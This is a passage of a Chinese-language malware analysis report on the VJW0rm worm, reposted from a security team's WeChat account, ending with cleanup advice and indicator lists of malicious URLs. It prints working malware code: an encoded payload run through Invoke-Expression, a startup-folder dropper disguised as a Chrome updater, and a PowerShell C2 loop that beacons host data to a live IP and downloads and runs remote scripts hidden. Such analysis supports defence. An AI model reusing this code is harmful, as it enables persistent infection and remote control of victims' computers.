,306176,329472,326144,306176,329472,332800,306176,329472,326144,306176,332800,329472,306176,329472,326144,306176,329472,332800,306176,329472,342784,306176,346112,319488,306176,346112,332800,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,329472,326144,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,425984,482560,545792,505856,469248,352768,352768,396032,495872,545792,439296,495872,522496,532480,425984,482560,545792,505856,292864,296192,266240,302848,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,306176,266240,279552,376064,462592,322816,469248,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,272896,465920,449280,509184,525824,412672,422656,396032,422656,419328,442624,532480,492544,482560,545792,495872,312832,552448,485888,542464,272896,306176,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,282880,425984,439296,282880,272896,306176,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,425984,529152,555776,495872,539136,435968,505856,495872,519168,519168,312832,495872,559104,495872,266240,309504,449280,509184,525824,492544,529152,555776,435968,545792,562432,519168,495872,266240,399360,509184,492544,492544,495872,525824,266240,309504,389376,559104,495872,489216,549120,545792,509184,529152,525824,425984,529152,519168,509184,489216,562432,266240,432640,495872,522496,529152,545792,495872,435968,509184,502528,525824,495872,492544,266240,309504,392704,509184,519168,495872,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,382720,519168,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,189696,203008,193024,189696,289536,442624,525824,289536,266240,569088,203008,193024,189696,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,189696,485888,539136,495872,482560,515840,266240,575744,203008,193024,266240,266240,266240,266240,575744,203008,193024,266240,266240,266240,266240,435968,545792,482560,539136,545792,309504,435968,519168,495872,495872,532480,266240,309504,416000,509184,519168,519168,509184,542464,495872,489216,529152,525824,492544,542464,266240,329472,319488,319488,319488,203008,193024,575744)
[String] $PDF = [System.Text.UTF8Encoding]::UTF8.GetString((IntegerToBytes $rawData '00125495565210225012546982'))
Invoke-Expression $PDF

自启动

第二层转译

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic


function DropToStartup() {
    [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
    [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + 'GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}
DropToStartup

将代码

Set OBB = CreateObject("WScript.Shell")
OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"C:UsersAdministratorDesktopworm_server.ps1",0

写入路径

C:UsersHk_MayflyAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupGoogleChromeUpdateHandlerx64.vbs,即设置为自启动

C2控制脚本

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic

[Object] $HTTP_OBJECT = [Microsoft.VisualBasic.Interaction]::CreateObject('MSXML2.XMLHTTP')
[String] $IP = '185.81.157.136'
[String] $Port = '3681'
[String] $Splitter = '|V|'
$ErrorActionPreference = 'SilentlyContinue'

function DropToStartup() {
    [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
    [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + 'GoogleChromeUpdateHandler.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}

Function HTTP($DA, $Param) {
    [String] $Response = [String]::Empty
    try
    {
        $HTTP_OBJECT.Open('POST''http://' + $IP + ':' + $Port + '/' + $DA, $false)
        $HTTP_OBJECT.SetRequestHeader('User-Agent:', $INFO)
        $HTTP_OBJECT.Send($Param)
        $Response = [Convert]::ToString($HTTP_OBJECT.ResponseText)
    } catch { }
    return $Response
}

Function INF {
    [String] $MAC = HWID($env:computername)
    [String] $ID = 'Novo_' + $MAC
    [String] $VER = 'v0.2'
    [String] $OS = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,"|")[0] + " " + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    [String] $AV = 'Windows Defender'
    return $ID + "" + ($env:COMPUTERNAME) + "" + ($env:UserName) + "" + $OS + "" + $AV + "" + "Yes" + "" + "Yes" + "" + "FALSE" + ""
}

Function HWID($strComputer) {
    $ErrorActionPreference = 'SilentlyContinue'
    $lol = [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID))
    return ([Microsoft.VisualBasic.Strings]::Split($lol,'-')[0] + [Microsoft.VisualBasic.Strings]::Split($lol,'-')[1])
}

DropToStartup
[String] $INFO = INF

while($true)
{
    $A = [Microsoft.VisualBasic.Strings]::Split((HTTP("
Vre", "")) , $Splitter)
    switch($A[0]) {
        'TR' {
            [String] $PsFileName =  [System.Guid]::NewGuid().ToString().Replace("
-", "") + ".PS1"
            [String] $StartupContent = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,87,115,104,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,117,110,32,34,80,111,119,101,114,115,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,70,105,108,101,32,34,32,43,32,34,37,80,84,37,34,44,32,48))
            $TargetPath = [System.IO.Path]::GetTempPath() + $PsFileName
            [System.IO.File]::WriteAllText($TargetPath, $A[1])
            [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "
WinLOGONUpdate.vbs", $StartupContent.Replace("%PT%", $TargetPath))
            PowerShell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File $TargetPath
        break }

        'Cl' {
            [Environment]::Exit(0)
        break }

    'Un' {
        [Environment]::Exit(0)
    break }
    }
    Start-Sleep -Milliseconds 3000
}

每3秒向服务器http://185.81.157.136:3681/Vre发起请求,并会将感染机信息放入User-Agent字段,以POST请求发送到服务器。类似:

{User-Agent:Novo_DESKTOP-KQH6LSBHk_MayflyMicrosoft Windows 10 专业版 64 位Windows DefenderYesYesFALSE} 同时,远程服务器返回信息控制感染机:

指令代码 含义
TR 下载远程恶意代码执行
Cl 终止恶意进程
Un 终止恶意进程

执行TR命令时: 

  1. 会将远程恶意文件下载到临时目录

    C:UsersHk_MayflyAppDataLocalTemp4af4ccd7024e4982ae61202d8926e0bf.PS1,将恶意文件路径写入到C:UsersHk_MayflyAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupWinLOGONUpdate.vbs,设为自启动,并执行命令WshShell.Run “Powershell -ExecutionPolicy Bypass -File ” + “C:UsersHk_MayflyAppDataLocalTemp4af4ccd7024e4982ae61202d8926e0bf.PS1”, 0启动恶意文件。样本行为有点类似紫狐病毒了~


总结

修复建议:

  1. 清除临时目录下的{hash}.PS1文件

  2. 清除自启动目录下的

    WinLOGONUpdate.vbs和GoogleChromeUpdateHandlerx64.vbs文件

IOC信息:

6b9b98ab790280f0ae64ac2b30ee8220
http://2.56.57.82/1/1.txt
http://2.56.57.82/1/SystemLogin.txt
http://2.56.57.82/1/Win10.txt
http://185.81.157.136:3681/Vre

其它
http://blackid-42311.portmap.host:7974/Vre
http://janda.publicvm.com:1005/Vre
http://severdops.ddns.net:5050/Vre

C段中还发现了其他恶意URL:

http://2.56.57.181/ordine_STAR_PROGETTI_Uupepfct.jpg
http://2.56.57.187/moo/m00r4i.arm
http://2.56.57.187/moo/m00r4i.arm5
http://2.56.57.187/moo/m00r4i.arm6
http://2.56.57.187/moo/m00r4i.arm7
http://2.56.57.187/moo/m00r4i.m68k
http://2.56.57.187/moo/m00r4i.mips
http://2.56.57.187/moo/m00r4i.mpsl
http://2.56.57.187/moo/m00r4i.ppc
http://2.56.57.187/moo/m00r4i.sh4
http://2.56.57.187/moo/m00r4i.spc
http://2.56.57.187/moo/m00r4i.x86
http://2.56.57.49/LjEZs/uYtea.arm
http://2.56.57.49/LjEZs/uYtea.arm5
http://2.56.57.49/LjEZs/uYtea.arm6
http://2.56.57.49/LjEZs/uYtea.m68k
http://2.56.57.49/LjEZs/uYtea.mpsl
http://2.56.57.49/LjEZs/uYtea.ppc
http://2.56.57.49/LjEZs/uYtea.spc
http://2.56.57.49/LjEZs/uYtea.x86
http://2.56.57.49/LjEZs/uYtea.x86_64
http://2.56.57.49/arm5
http://2.56.57.49/arm6
http://2.56.57.49/arm7
http://2.56.57.49/m68k
http://2.56.57.49/mips
http://2.56.57.49/mpsl
http://2.56.57.49/x86
http://2.56.57.98/arm
http://2.56.57.98/hahahaha.sh
http://2.56.57.98/i686
http://2.56.57.98/mipsel
http://2.56.57.98/sh4
http://2.56.57.98/sparc

end


招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析 长期招新

欢迎联系[email protected]



VJW0rm蠕虫病毒分析报告

原文始发于微信公众号(ChaMd5安全团队):VJW0rm蠕虫病毒分析报告

版权声明:admin 发表于 2022年5月18日 上午8:53。
转载请注明:VJW0rm蠕虫病毒分析报告 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...